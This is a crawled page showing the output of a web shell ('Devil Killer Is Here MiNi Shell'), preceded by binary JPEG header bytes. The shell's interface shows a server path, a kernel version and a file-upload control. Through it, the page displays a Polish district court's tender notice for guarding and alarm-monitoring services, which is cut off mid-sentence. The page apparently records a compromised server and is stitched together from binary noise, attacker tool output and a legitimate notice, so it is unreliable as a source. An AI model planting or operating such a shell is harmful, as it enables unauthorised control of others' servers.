JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/0010971701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi ochrony osób i mienia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Rejonowy Lublin-Zachód w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 060712314</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krakowskie Przedmieście 76</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-950</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 814781625</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam.pub@lublin-zachod.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lublin-zachod.sr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wymiar sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi ochrony osób i mienia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8e7b9c6b-0921-49de-8f9a-593d51b662d6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00109717</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8e7b9c6b-0921-49de-8f9a-593d51b662d6 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl. Korzystanie z Platformy e-Zamówienia jest bezpłatne. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia): https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8e7b9c6b-0921-49de-8f9a-593d51b662d6<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”). W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia (np. awaria Platformy lub jej niedostępność) Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: e-mail: zam.pub@lublin-zachod.sr.gov.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących w szczególności SWZ wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 25 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. Zaleca się stosowanie aktualnie wspieranych wersji oprogramowania. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych (oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy pzp, podmiotowe środki dowodowe w tym oświadczenie , o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp, pełnomocnictwo) sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2024 r. poz. 773), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. Dopuszczalne formaty przesyłanych danych to m.in.: .pdf., png, .jpg, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .zip, .txt, .xml, .pades, .xades, .tar, .7z lub inne zgodnie z obowiązującymi przepisami prawa. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści „Formularza do komunikacji”). Oferty, oświadczenia i dokumenty w przedmiotowym postępowaniu składa się przy użyciu środków komunikacji elektronicznej. W postępowaniu można korzystać z następujących podpisów elektronicznych: podpisu kwalifikowanego elektronicznego, podpisu osobistego lub podpisu zaufanego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych zamieszczone zostały w rozdz. XXVII SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych zamieszczone zostały w rozdz. XXVII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.261.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot Umowy obejmuje:<br/>1) Usługi ochrony osób i mienia, świadczone na rzecz Sądu Rejonowego Lublin-Zachód w Lublinie realizowane w formie:<br/>a) Bezpośredniej ochrony fizycznej:<br/>- stałej<br/>- polegającej na stałym dozorze sygnałów alarmowych.<br/>b) Zabezpieczenia technicznego, polegającego na konserwacji systemów alarmowych.<br/>2) Usługi obsługi szatni.<br/>2. Stała, bezpośrednia ochrona fizyczna osób i mienia powinna być świadczona w niżej wymienionych budynkach<br/>(obiektach) i terenie przyległym (parkingi, obszar wokół budynków).<br/>1) Budynek przy ulicy Krakowskie Przedmieście 76 w Lublinie.<br/>2) Budynek przy ulicy Krakowskie Przedmieście 78 w Lublinie.<br/>3) Budynek przy ulicy Konrada Wallenroda 4d w Lublinie.<br/>4) Budynek przy ulicy Boczna Lubomelskiej 13 w Lublinie.<br/>Ochrona obiektów powinna być realizowana w formie bezpośredniej ochrony fizycznej wykonywanej przez osoby wpisane<br/>na listę kwalifikowanych pracowników ochrony fizycznej, zgodnie z ustawą o ochronie osób i mienia z dnia 22 sierpnia 1997<br/>roku. Liczba osób ochraniających poszczególne lokalizacje oraz ich czas przebywania w ochranianym obszarze nie powinny<br/>być mniejsze od poniżej podanych:<br/>a) W budynku przy ulicy Krakowskie Przedmieście 76 w Lublinie – minimum 2 osoby, w tym:<br/>- posterunek portierni – jedna osoba całodobowo, 7 dni w tygodniu<br/>- posterunek bramki – jedna osoba, w godzinach od 6.30 do 18.30 w poniedziałek i od 6.30 do 16.00 od wtorku do piątku, z<br/>wyłączeniem dni wolnych od pracy dla Zamawiającego.<br/>b) W budynku przy ulicy Krakowskie Przedmieście 78 w Lublinie – minimum 2 osoby, w tym:<br/>- posterunek portierni – jedna osoba całodobowo, 7 dni w tygodniu<br/>- posterunek bramki – jedna osoba, w godzinach od 6.30 do 18.30 w poniedziałek i od 6.30 do 16.00 od wtorku do piątku, z<br/>wyłączeniem dni wolnych od pracy dla Zamawiającego.<br/>c) Wykonawca oprócz powyżej podanej liczby pracowników wymaganej w lokalizacjach przy ul. Krakowskie Przedmieście 76<br/>i 78 zobowiązany będzie do zapewnienia dodatkowego pracownika pełniącego służbę w godzinach:<br/>- od 18.30 w poniedziałek do 6.30 we wtorek<br/>- od 16.00 we wtorek do 6.30 w środę<br/>- od 16.00 w środę do 6.30 w czwartek<br/>- od 16.00 w czwartek do 6.30 w piątek<br/>- od 16:00 w piątek do 6:30 w poniedziałek<br/>- całodobowo w dni wolne od pracy dla Sądu.<br/>Zadaniem dodatkowego pracownika ochrony pełniącego służbę w obrębie posesji przy ulicy Krakowskie Przedmieście 76 i<br/>78, w dni wolne od pracy oraz po godzinach urzędowania Sądu, będzie przede wszystkim dokonywanie obchodów terenu<br/>zewnętrznego oraz kontroli wewnątrz dwóch budynków zlokalizowanych na jednej posesji. Kontrole wewnątrz każdego z<br/>obiektów należy przeprowadzać z częstotliwością minimum co jedną godzinę.<br/>d) W budynku przy ulicy Konrada Wallenroda 4d w Lublinie – minimum 2 osoby, w tym:<br/>- posterunek portierni – jedna osoba całodobowo, 7 dni w tygodniu<br/>- posterunek bramki – jedna osoba całodobowo, 7 dni w tygodniu.<br/>e) w budynku przy ulicy Boczna Lubomelskiej 13 w Lublinie – minimum 2 osoby, w tym:<br/>- posterunek portierni – jedna osoba całodobowo, 7 dni w tygodniu<br/>- posterunek bramki – jedna osoba całodobowo, 7 dni w tygodniu.<br/>Po zakończeniu dyżurów na posterunkach bramki, w lokalizacjach: przy ul. K. Wallenroda 4d oraz Boczna Lubomelskiej 13,<br/>zadaniem pracownika ochrony jest dokonywanie obchodów terenu zewnętrznego oraz kontroli wewnątrz budynku. Kontrole:<br/>zewnętrzną i wewnętrzną obiektu należy przeprowadzać z częstotliwością minimum co jedną godzinę.<br/>3. Wykonawcy powierzony zostanie obowiązek połączenia dwutorowego systemów sygnalizacji pożaru:<br/>- drogą radiową - z wykorzystaniem urządzeń Wykonawcy,<br/>- drogą telefoniczną - z wykorzystaniem linii telefonicznych Zamawiającego,<br/>z obiektem komendy Państwowej Straży Pożarnej lub obiektem, wskazanym przez właściwego miejscowo komendanta<br/>miejskiego Państwowej Straży Pożarnej, zgodnie z Ustawą z dnia 24 sierpnia 1991 r. o ochronie przeciwpożarowej (Dz.U.<br/>2024 poz. 275 ze zm.).<br/>Monitorowanie sygnałów z systemów sygnalizacji pożaru powinno być realizowane z budynków Sądu Rejonowego Lublin-Zachód w Lublinie, położonych w Lublinie przy ulicach:<br/>1) Krakowskie Przedmieście 76,<br/>2) Krakowskie Przedmieście 78,<br/>3) Konrada Wallenroda 4d,<br/>4) Boczna Lubomelskiej 13.<br/>Wykonawcy powierzony zostanie obowiązek monitorowania i rejestracji pracy systemów sygnalizacji włamania i napadu.<br/>Monitorowanie tych systemów powinno odbywać się możliwie wielotorowo. Obowiązkiem wykonawcy będzie monitorowanie<br/>systemów z wykorzystaniem nadajników Wykonawcy (np. siecią GSM lub drogą radiową) oraz, o ile infrastruktura<br/>telefoniczna Zamawiającego będzie to umożliwiała, również z wykorzystaniem linii telefonicznych Zamawiającego.<br/>Wykonawca powinien przeprowadzać test łączy, z częstotliwością minimum 2 testy na godzinę. Połączenie powinno<br/>umożliwiać przede wszystkim przesyłanie sygnałów o wywołanych alarmach oraz stanie systemu.<br/>Całodobowa usługa w formie monitorowania sygnałów z systemów sygnalizacji włamania i napadu powinna być świadczona<br/>w niżej wymienionych obiektach.<br/>1) Budynek przy ulicy Krakowskie Przedmieście 76 w Lublinie<br/>2) Budynek przy ulicy Krakowskie Przedmieście 78 w Lublinie<br/>3) Budynek przy ulicy Konrada Wallenroda 4d w Lublinie<br/>4) Budynek przy ulicy Boczna Lubomelskiej 13 w Lublinie<br/>5) Budynek przy ulicy M. Koryznowej 2b w Lublinie (Ośrodek Kuratorski)<br/>6) Budynek przy ulicy Radości 13 w Lublinie (Ośrodek Kuratorski).<br/>4. Wykonawca zobowiązany będzie do przeprowadzania konserwacji systemów i urządzeń następujących lokalizacjach:<br/>1) Budynek przy ulicy Krakowskie Przedmieście 76 w Lublinie,<br/>2) Budynek przy ulicy Krakowskie Przedmieście 78 w Lublinie,<br/>3) Budynek przy ulicy Konrada Wallenroda 4d w Lublinie,<br/>4) Budynek przy ulicy Boczna Lubomelskiej 13 w Lublinie,<br/>5) Budynek przy ulicy Koryznowej 2b w Lublinie (Ośrodek Kuratorski),<br/>6) Budynek przy ulicy Radości 13 w Lublinie (Ośrodek Kuratorski).<br/>5. Do zadań Wykonawcy należała będzie obsługa szatni zlokalizowanych w budynkach przy ul. Krakowskie Przedmieście<br/>76, Krakowskie Przedmieście 78 oraz Konrada Wallenroda 4d.<br/>Usługa obsługi szatni powinna być świadczona w miesiącach: październik, listopad, grudzień, styczeń, luty, marzec i<br/>kwiecień, tj. przez siedem miesięcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający może skorzystać z prawa opcji w zakresie zwiększenia liczby godzin świadczonych usług w ramach tzw.<br/>„wzmocnienia ochrony”. Liczba godzin świadczenia usług w ramach „wzmocnienia ochrony” nie przekroczy 2 000<br/>roboczogodzin.<br/>Na skorzystanie z prawa opcji może mieć wpływ decyzja Zamawiającego dotycząca świadczenia następujących usług :<br/>• obsługi dodatkowego posterunku ochrony/szatni,<br/>• wcześniejszego uruchomienia szatni,<br/>• zwiększenia składu osobowego posterunku.<br/>Usługi objęte prawem opcji uruchamiane będą na wniosek Zamawiającego. Zamawiający poinformuje Wykonawcę o<br/>konieczności zwiększenia zakresu świadczonych usług podając miejsce, datę i godzinę rozpoczęcia i zakończenia<br/>„wzmocnienia ochrony” oraz liczbę wymaganych osób. Podana przez Zamawiającego data i godzina rozpoczęcia usług<br/>objętych „wzmocnieniem ochrony” uwzględniać będzie podaną przez Wykonawcę liczbę godzin na zapewnienie<br/>wzmocnienia ochrony w kryterium oceny ofert - „Czas na zapewnienie wzmocnienia ochrony”. Zamawiający dopuszcza<br/>maksymalny 24 godzinny czas na zapewnienie świadczenia usług objętych wzmocnieniem ochrony.<br/>W przypadku skorzystania z prawa opcji zapłata wynagrodzenia Wykonawcy nastąpi za rzeczywiście wykonane<br/>roboczogodziny w danym okresie rozliczeniowym.<br/>Skorzystanie z prawa opcji nie stanowi zmiany Umowy. Zamawiający nie jest zobowiązany do skorzystania z prawa opcji.<br/>Wykonawcy nie przysługuje prawo domagania się realizacji zamówienia w zakresie prawa opcji, jeżeli Zamawiający nie<br/>skorzysta z przedmiotowego prawa.<br/>Nieskorzystanie przez Zamawiającego z prawa opcji nie wymaga podania przyczyny i nie<br/>stanowi podstawy do dochodzenia względem niego odpowiedzialności z tytułu niewykonania Umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp Zamawiający dopuszcza udzielnie zamówień w trybie zamówienia z wolnej ręki i w zakresie nieprzekraczającym 20 % wartości zamówienia podstawowego, w szczególności w przypadku konieczności zapewnienia ciągłości świadczenia usług ochrony/obsługi szatni. Umowa zwarta w tym trybie będzie obowiązywała nie dłużej niż do momentu wejścia w życie nowej umowy zawartej w trybie konkurencyjnym. Umowa zawarta w trybie zamówienia z wolnej ręki nie będzie zawierała postanowień kształtujących prawa i obowiązki Wykonawcy, w zakresie kar umownych oraz warunków wypłaty wynagrodzenia, w sposób dla niego mniej korzystny niż prawa i obowiązki Wykonawcy ukształtowane postanowieniami umowy zawartej w przedmiotowym postępowaniu. Ostateczne warunki, na jakich zostanie udzielone zamówienie w trybie zamówienia z wolnej ręki, zostaną sprecyzowane w treści umowy, która zostanie ustalona w wyniku negocjacji między Zamawiającym i Wykonawcą. Decyzje Zamawiającego będą jednak ograniczone koniecznością spełnienia przesłanek z art. 214 ust. 1 pkt 7 ustawy Pzp</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas na zapewnienie wzmocnienia ochrony</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/> 1.1. zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa warunku w ww. zakresie.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek, jeżeli wykaże się posiadaniem ważnej koncesji na wykonywanie działalności w zakresie usług<br/>ochrony osób i mienia w rozumieniu ustawy o ochronie osób 